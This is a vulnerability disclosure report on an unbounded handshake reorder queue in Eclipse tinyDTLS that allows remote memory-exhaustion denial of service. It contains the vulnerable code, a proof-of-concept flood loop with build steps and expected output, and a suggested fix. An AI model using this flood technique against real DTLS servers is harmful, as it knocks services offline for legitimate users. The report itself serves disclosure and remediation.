tinydtls Unbounded Handshake Reorder Queue DoS

## 1. Report Metadata

| Field | Value |
|---|---|
| Project | Eclipse tinyDTLS |
| Title | Unbounded per-peer handshake reorder queue enables remote memory-exhaustion DoS |
| Affected component | `dtls.c`, `netq.c` |
| Affected function | `handle_handshake()` (reorder buffering branch) |
| Affected role | DTLS server (posix/malloc builds) |
| Tested version | `v0.9-rc1-214-g6f4f604` (commit `6f4f604`, `main`) |
| Suggested CWE | CWE-400 (Uncontrolled Resource Consumption), CWE-770 (Allocation of Resources Without Limits or Throttling) |
| Impact class | Remote Denial of Service (memory exhaustion) |

## 2. Executive Summary

Eclipse tinyDTLS maintains a per-peer reorder queue for out-of-order
DTLS handshake messages.  When a handshake message arrives with a
message sequence number (`mseq`) greater than the expected next
sequence (`mseq_r`), the library allocates a new queue node via
`malloc()` and copies the entire message into it, intending to replay
it once the gap is filled.

There is **no limit on the number of queued nodes** on posix/malloc
builds.  The source code contains a literal `/* TODO: only add packet
that are not too new. */` comment at the allocation site,
acknowledging that the bound is missing.

A remote, unauthenticated attacker who can reach the DTLS server can
send a flood of handshake messages with distinct `mseq` values (1
through 65535).  Each message causes a `malloc` of up to
`sizeof(netq_t) + DTLS_MAX_BUF` bytes (~1448 bytes on posix; ~1348
bytes with the 1300-byte bodies used in the PoC).  With all 65535
distinct `mseq` values queued at ~1348 bytes each, a single peer can
force the server to allocate approximately **84 MB** of queue memory.
An attacker who establishes many peers (each from a source address
and port on which it can receive the cookie reply) can exhaust all
available server memory, crashing the process or denying service to
legitimate clients.

Contiki and RIOT builds are **not affected** because they use a
fixed-size memory pool (`NETQ_MAXCNT` = 3 for PSK, 5 for ECC) that
caps the queue length.

## 3. Vulnerability Overview

The vulnerable code is in `handle_handshake()`, in the branch that
handles out-of-order messages:

@tinydtls/dtls.c:4362-4405
```c
  uint16_t mseq = dtls_uint16_to_int(hs_header->message_seq);
  if (mseq < peer->handshake_params->hs_state.mseq_r) {
    dtls_warn("The message sequence number is too small, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);
    return 0;
  } else if (mseq > peer->handshake_params->hs_state.mseq_r) {
    /* A packet in between is missing, buffer this packet. */
    netq_t *n;

    dtls_info("The message sequence number is too larger, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);

    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    netq_t *node = netq_head(&peer->handshake_params->reorder_queue);
    while (node) {
      dtls_handshake_header_t *node_header = DTLS_HANDSHAKE_HEADER(node->data);
      if (dtls_uint16_to_int(node_header->message_seq) == mseq) {
        dtls_warn("a packet with this sequence number is already stored\n");
        return 0;
      }
      node = netq_next(node);
    }

    n = netq_node_new(data_length);
    if (!n) {
      dtls_warn("no space in reorder buffer\n");
      return 0;
    }

    n->peer = peer;
    n->length = data_length;
    memcpy(n->data, data, data_length);

    if (!netq_insert_node(&peer->handshake_params->reorder_queue, n)) {
      dtls_warn("cannot add packet to reorder buffer\n");
      netq_node_free(n);
    }
    dtls_info("Added packet %u for reordering\n", mseq);
    return 0;
  }
```

The flaw is the absence of any cap on the number of nodes
in `peer->handshake_params->reorder_queue`.  The only checks are:

1. `data_length <= DTLS_MAX_BUF` (line 4375) — limits node **size**,
   not node **count**.
2. A dedup scan (lines 4380-4388) — prevents the same `mseq` from
   being queued twice, but does not limit distinct `mseq` values.

The `TODO` comment at line 4374 explicitly acknowledges that packets
with "too new" `mseq` values should be rejected, but this was never
implemented.

The underlying allocator on posix is unbounded:

@tinydtls/netq.c:38-41
```c
static inline netq_t *
netq_malloc_node(size_t size) {
  return (netq_t *)malloc(sizeof(netq_t) + size);
}
```

## 4. Technical Root Cause

### Reachability

The reorder queue is reachable from `dtls_handle_message()` via the
normal handshake dispatch path:

1. `dtls_handle_message()` — `@tinydtls/dtls.c:4627`
   iterates over DTLS records.
2. For a known peer with valid security parameters, the record is
   passed to `decrypt_verify()` and, if it decrypts, dispatched by
   content type.
3. `DTLS_CT_HANDSHAKE` records go to `handle_handshake()` at
   `@tinydtls/dtls.c:4777`.
4. `handle_handshake()` validates the handshake header
   (`fragment_length + DTLS_HS_LENGTH == data_length`) and then
   checks `mseq` against `mseq_r`.
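
The header validation in step 4 can be illustrated in isolation. The following is a minimal sketch, not tinyDTLS code: it assumes the 12-byte handshake header layout from RFC 6347 (which `DTLS_HS_LENGTH` appears to correspond to), and the names `hs_header_view_t`, `read_u24`, and `parse_hs_header` are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* RFC 6347 handshake header size; assumed to match DTLS_HS_LENGTH. */
#define HS_HEADER_LEN 12u

/* Hypothetical parsed view of a handshake header (not a tinyDTLS type). */
typedef struct {
  uint8_t  msg_type;
  uint32_t length;          /* 24-bit total message length */
  uint16_t message_seq;     /* the mseq compared against mseq_r */
  uint32_t fragment_offset; /* 24-bit */
  uint32_t fragment_length; /* 24-bit */
} hs_header_view_t;

/* Read a 24-bit big-endian integer. */
static uint32_t read_u24(const uint8_t *p) {
  return ((uint32_t)p[0] << 16) | ((uint32_t)p[1] << 8) | p[2];
}

/* Returns 1 and fills *out when the declared fragment_length plus the
 * header size equals the number of bytes present; returns 0 otherwise. */
int parse_hs_header(const uint8_t *buf, size_t data_length,
                    hs_header_view_t *out) {
  if (data_length < HS_HEADER_LEN)
    return 0;
  out->msg_type        = buf[0];
  out->length          = read_u24(buf + 1);
  out->message_seq     = (uint16_t)((buf[4] << 8) | buf[5]);
  out->fragment_offset = read_u24(buf + 6);
  out->fragment_length = read_u24(buf + 9);
  return (size_t)out->fragment_length + HS_HEADER_LEN == data_length;
}
```

Only messages that pass this length check reach the `mseq` comparison, so the attacker's flood messages need a consistent header but no valid body.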

### Pre-authentication reachability

On the **server side**, the reorder path is reachable as soon as a
peer exists with `handshake_params` allocated.  This happens after
the cookie exchange completes (`handle_0_verified_client_hello()`
creates `handshake_params` at `@tinydtls/dtls.c:4238`).
At that point `mseq_r = 0`, so **any** handshake message with
`mseq >= 1` takes the `mseq > mseq_r` branch and is queued.

The attacker does **not** need to complete the handshake — only the
cookie exchange (one round trip).  After that, the attacker can flood
thousands of out-of-order messages without ever sending the expected
`mseq = 0` message.

### Why the queue grows without bound

The `mseq` field is a 16-bit unsigned integer (`uint16_t`), so there
are 65536 possible values, and with `mseq_r = 0` all 65535 nonzero
values count as "future" messages.  The dedup scan only rejects exact
duplicates; nothing rejects values far ahead of `mseq_r`.  The `TODO`
comment at line 4374 suggests that a check along the lines of
`mseq - mseq_r <= MAX_REORDER_WINDOW` was intended, but it was never
implemented.

### Memory per node

Each queued node is `sizeof(netq_t) + data_length` bytes.  On a
64-bit posix build, `sizeof(netq_t)` is approximately 48 bytes
(pointers, counters, length).  With `data_length` up to
`DTLS_MAX_BUF` (1400 on posix), each node can be up to ~1448 bytes.
The PoC uses 1300-byte bodies, yielding ~1348 bytes per node.
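
The per-node and per-peer figures can be reproduced with a few lines of arithmetic. This is a sketch under the assumptions stated in this report (a roughly 48-byte `netq_t` and 65535 queueable `mseq` values); the macro and function names are hypothetical, and allocator bookkeeping overhead is ignored.

```c
#include <stdint.h>

/* Figures assumed from the report text, not measured by this code. */
#define NETQ_OVERHEAD_BYTES 48u    /* approximate sizeof(netq_t), 64-bit posix */
#define MAX_DISTINCT_MSEQ   65535u /* mseq values 1..65535 when mseq_r = 0 */

/* Bytes requested from malloc for one queued node. */
uint64_t node_bytes(uint32_t data_length) {
  return (uint64_t)NETQ_OVERHEAD_BYTES + data_length;
}

/* Bytes requested for one peer if every distinct mseq is queued. */
uint64_t peer_worst_case_bytes(uint32_t data_length) {
  return node_bytes(data_length) * MAX_DISTINCT_MSEQ;
}
```

With `data_length = 1300` this gives 88,341,180 bytes (about 84 MiB), which matches the ~84 MB figure used in this report. With `data_length = 1400` (the `DTLS_MAX_BUF` limit) it gives 94,894,680 bytes, or about 90 MiB.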

### Platform dependence

- **posix/malloc** (`!(WITH_CONTIKI) && !(RIOT_VERSION)`): unbounded
  `malloc` — **vulnerable**.
- **Contiki**: `MEMB(netq_storage, netq_t, NETQ_MAXCNT)` with
  `NETQ_MAXCNT` = 3 (PSK) or 5 (ECC) — **not vulnerable** (pool
  capped).
- **RIOT**: `memarray` with `NETQ_MAXCNT` entries — **not
  vulnerable** (pool capped).
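
To illustrate why a pool-backed allocator caps the queue, here is a minimal fixed-slot pool. It is a hypothetical model only: it does not use the Contiki `MEMB` or RIOT `memarray` APIs, and `node_pool_t`, `pool_alloc`, and the slot constants are names chosen for this sketch.

```c
#include <stddef.h>
#include <string.h>

#define POOL_SLOTS 3    /* mirrors NETQ_MAXCNT = 3 (PSK) for illustration */
#define SLOT_BYTES 1400 /* mirrors DTLS_MAX_BUF on posix; an assumption here */

/* Hypothetical fixed-size pool; storage is reserved up front. */
typedef struct {
  unsigned char data[POOL_SLOTS][SLOT_BYTES];
  unsigned char in_use[POOL_SLOTS];
} node_pool_t;

void pool_init(node_pool_t *p) {
  memset(p->in_use, 0, sizeof p->in_use);
}

/* Returns a free slot, or NULL once all POOL_SLOTS are taken. */
void *pool_alloc(node_pool_t *p) {
  for (size_t i = 0; i < POOL_SLOTS; i++) {
    if (!p->in_use[i]) {
      p->in_use[i] = 1;
      return p->data[i];
    }
  }
  return NULL;
}

/* Marks the slot that owns this pointer as free again. */
void pool_free(node_pool_t *p, void *slot) {
  for (size_t i = 0; i < POOL_SLOTS; i++) {
    if (slot == (void *)p->data[i]) {
      p->in_use[i] = 0;
      return;
    }
  }
}
```

Once the slots are exhausted the allocation fails, which in `handle_handshake()` would take the existing `no space in reorder buffer` path instead of growing the queue.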

## 5. Proof of Concept

The PoC (`poc.c`) `#include`s `dtls.c` to access the static
`handle_handshake()` path and the peer's `reorder_queue`.  It:

1. Creates a DTLS context and a peer in
   `DTLS_STATE_WAIT_CLIENTKEYEXCHANGE` with `handshake_params`
   allocated and `mseq_r = 0` (simulating the post-cookie state).
2. Sends 2000 epoch-0 handshake records, each with a distinct record
   sequence number and a distinct handshake `mseq` (1 through 2000),
   each carrying a 1300-byte body.
3. Counts the resulting reorder queue length and measures RSS growth.

The flood loop:

```c
for (int i = 0; i < NUM_FLOOD_MESSAGES; i++) {
    uint16_t mseq = (uint16_t)(i + 1);   /* 1..2000, all > mseq_r=0 */
    uint64_t rseq = (uint64_t)(i + 1);

    uint8 *p = pkt;
    p = put_record_header(p, DTLS_CT_HANDSHAKE, 0, rseq, fraglen);
    p = put_handshake_header(p, DTLS_HT_CLIENT_KEY_EXCHANGE,
                             BODY_SIZE, mseq, 0, BODY_SIZE);
    memset(p, 0x41, BODY_SIZE);
    p += BODY_SIZE;

    size_t pktlen = (size_t)(p - pkt);
    dtls_handle_message(ctx, &sess, pkt, (int)pktlen);
}
```

Every message takes the `mseq > mseq_r` branch and is queued.
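
The loop relies on two helpers, `put_record_header()` and `put_handshake_header()`, whose bodies are not shown here. The following is a guess at what they might look like, written against the RFC 6347 wire format (13-byte record header, 12-byte handshake header); the parameter types and the internal `put_u16`/`put_u24`/`put_u48` helpers are assumptions, and the PoC's actual implementation may differ.

```c
#include <stdint.h>

/* Big-endian writers; each returns the position after the written bytes. */
static uint8_t *put_u16(uint8_t *p, uint16_t v) {
  p[0] = (uint8_t)(v >> 8);
  p[1] = (uint8_t)v;
  return p + 2;
}

static uint8_t *put_u24(uint8_t *p, uint32_t v) {
  p[0] = (uint8_t)(v >> 16);
  p[1] = (uint8_t)(v >> 8);
  p[2] = (uint8_t)v;
  return p + 3;
}

static uint8_t *put_u48(uint8_t *p, uint64_t v) {
  for (int i = 5; i >= 0; i--)
    *p++ = (uint8_t)(v >> (8 * i));
  return p;
}

/* Record header: type(1) version(2) epoch(2) sequence(6) length(2). */
uint8_t *put_record_header(uint8_t *p, uint8_t type, uint16_t epoch,
                           uint64_t seq, uint16_t length) {
  *p++ = type;
  p = put_u16(p, 0xFEFD); /* DTLS 1.2 version bytes */
  p = put_u16(p, epoch);
  p = put_u48(p, seq);
  return put_u16(p, length);
}

/* Handshake header: type(1) length(3) message_seq(2) offset(3) frag_len(3). */
uint8_t *put_handshake_header(uint8_t *p, uint8_t msg_type, uint32_t length,
                              uint16_t mseq, uint32_t frag_offset,
                              uint32_t frag_length) {
  *p++ = msg_type;
  p = put_u24(p, length);
  p = put_u16(p, mseq);
  p = put_u24(p, frag_offset);
  return put_u24(p, frag_length);
}
```

Under this layout, the `fraglen` passed to `put_record_header()` in the loop would presumably be the handshake header size plus `BODY_SIZE`, so that the record length covers the whole handshake message.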

## 6. Build & Run

Working directory:
`tinydtls/vuln_002_reorder_queue_dos/`

```bash
cmake -B build -S .
cmake --build build -j$(nproc)
./build/vuln_poc_reorder_queue_dos
```

**Expected output:**

```
tinydtls PoC -- Finding 2: unbounded reorder queue DoS
=============================================================
DTLS_MAX_BUF = 1400
Flood count  = 2000 (distinct mseq values)
Platform     = posix/malloc (unbounded; Contiki/RIOT capped at NETQ_MAXCNT)

RSS before flood: 3476 KB

--- Results ---
Messages sent:          2000
Reorder queue length:   2000 nodes
Dropped (errors):       0
RSS after flood:        4352 KB
RSS increase:           876 KB
Mem per queued node:    ~448 bytes

[!] Vulnerability reproduced: reorder queue grew to 2000 nodes
    with no bound.  An attacker can exhaust server memory by
    flooding distinct mseq values (up to 65535 per peer).
    CWE-400 (Resource Exhaustion).

    Worst case per peer: 65535 nodes x ~1348 bytes = ~84 MB

Done.
```

Exit code: **0** (the PoC demonstrates memory growth, not a crash).

The queue grew to 2000 nodes with zero drops, adding ~876 KB of RSS.
The ~84 MB per-peer figure is derived from the requested allocation
size rather than from measured RSS: 65535 distinct `mseq` values at
~1348 bytes per node.

## 7. Impact

**Attacker position:** A remote, unauthenticated UDP peer who can
reach the DTLS server.  On the server side, the attacker must first
complete a cookie exchange (one round trip) to create a peer with
`handshake_params`, then flood out-of-order handshake messages.

**Denial of Service:**
- **Per-peer memory exhaustion:** A single attacker can force the
  server to allocate ~84 MB per peer by flooding all 65535 distinct
  `mseq` values with 1300-byte bodies (slightly more with bodies at
  the `DTLS_MAX_BUF` limit).
- **Multi-peer amplification:** Each additional peer requires its own
  cookie exchange.  That is cheap for the attacker, but it means the
  attacker must be able to receive the server's reply at every source
  address and port it uses, so blind spoofing is not sufficient.
  Each such peer can independently accumulate up to ~84 MB of queue
  memory, so N peers can pin roughly N × 84 MB of server RAM.
- **No legitimate traffic required:** The attacker never sends the
  expected `mseq = 0` message, so the queue is never drained.  The
  memory persists until the peer times out and is destroyed.

**CWE-400** (Uncontrolled Resource Consumption) / **CWE-770**
(Allocation of Resources Without Limits or Throttling).

**Severity:** Medium.  Requires cookie exchange (one round trip) but
no authentication.  Impact is memory exhaustion leading to process
crash or degraded service.  Contiki/RIOT builds are unaffected.

## 8. Remediation

Implement the `TODO` at `@tinydtls/dtls.c:4374`:
reject messages whose `mseq` is too far ahead of `mseq_r`.

Suggested fix — add a maximum reorder window check before the
allocation:

```c
    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    /* NEW: cap the reorder window to prevent memory exhaustion. */
    #define DTLS_REORDER_WINDOW 16
    if (mseq - peer->handshake_params->hs_state.mseq_r > DTLS_REORDER_WINDOW) {
      dtls_warn("mseq %u too far ahead of expected %u, dropping\n",
                mseq, peer->handshake_params->hs_state.mseq_r);
      return 0;
    }
```

A window of 16 is generous for normal DTLS reordering (UDP rarely
delivers more than a few messages out of order) while bounding the
worst-case queue to 16 × ~1448 = ~23 KB per peer.

**Additional hardening:**
- On posix builds, also enforce a maximum queue length (e.g. 32
  nodes) as a defense-in-depth measure, returning a fatal alert if
  exceeded.
- Consider a global `netq` pool with a configurable cap even on
  posix, matching the Contiki/RIOT design.
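
The window check and the queue-length cap can be combined into a single admission test. The sketch below models this with a hypothetical singly linked list; `qnode_t`, `queue_len`, and `may_buffer` are illustrative names and do not reflect the real `netq_t` layout or any existing tinyDTLS function.

```c
#include <stddef.h>
#include <stdint.h>

#define REORDER_WINDOW    16u /* same illustrative value as DTLS_REORDER_WINDOW */
#define REORDER_MAX_NODES 32u /* illustrative cap from the hardening note */

/* Hypothetical stand-in for a queued node; not the real netq_t. */
typedef struct qnode {
  struct qnode *next;
  uint16_t mseq;
} qnode_t;

/* Count the nodes currently in the queue. */
static size_t queue_len(const qnode_t *head) {
  size_t n = 0;
  for (; head; head = head->next)
    n++;
  return n;
}

/* Returns 1 if a message with sequence mseq may be buffered, 0 to drop it. */
int may_buffer(const qnode_t *head, uint16_t mseq_r, uint16_t mseq) {
  if (mseq <= mseq_r)
    return 0; /* not a future message */
  if ((unsigned)(mseq - mseq_r) > REORDER_WINDOW)
    return 0; /* too far ahead of the expected sequence */
  if (queue_len(head) >= REORDER_MAX_NODES)
    return 0; /* queue already at its cap */
  for (; head; head = head->next) {
    if (head->mseq == mseq)
      return 0; /* duplicate already stored */
  }
  return 1;
}
```

With a window of 16 the length cap should never trigger on its own, since at most 16 distinct sequence numbers are admissible at a time. It acts purely as defense in depth in case the window logic is later changed or bypassed.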

## 9. References

- CWE-400: Uncontrolled Resource Consumption — https://cwe.mitre.org/data/definitions/400.html
- CWE-770: Allocation of Resources Without Limits or Throttling — https://cwe.mitre.org/data/definitions/770.html
- RFC 6347 (DTLS 1.2), section 4.2.2 (Handshake Message Format,
  which covers `message_seq` handling) and section 4.2.1
  (Denial-of-Service Countermeasures).
- tinyDTLS source: `https://github.com/eclipse/tinydtls`
- Affected commit: `6f4f604` (`v0.9-rc1-214-g6f4f604`)
- Related TODO comment: `dtls.c:4374`

[vuln_002_reorder_queue_dos.zip](https://github.com/user-attachments/files/29229230/vuln_002_reorder_queue_dos.zip)
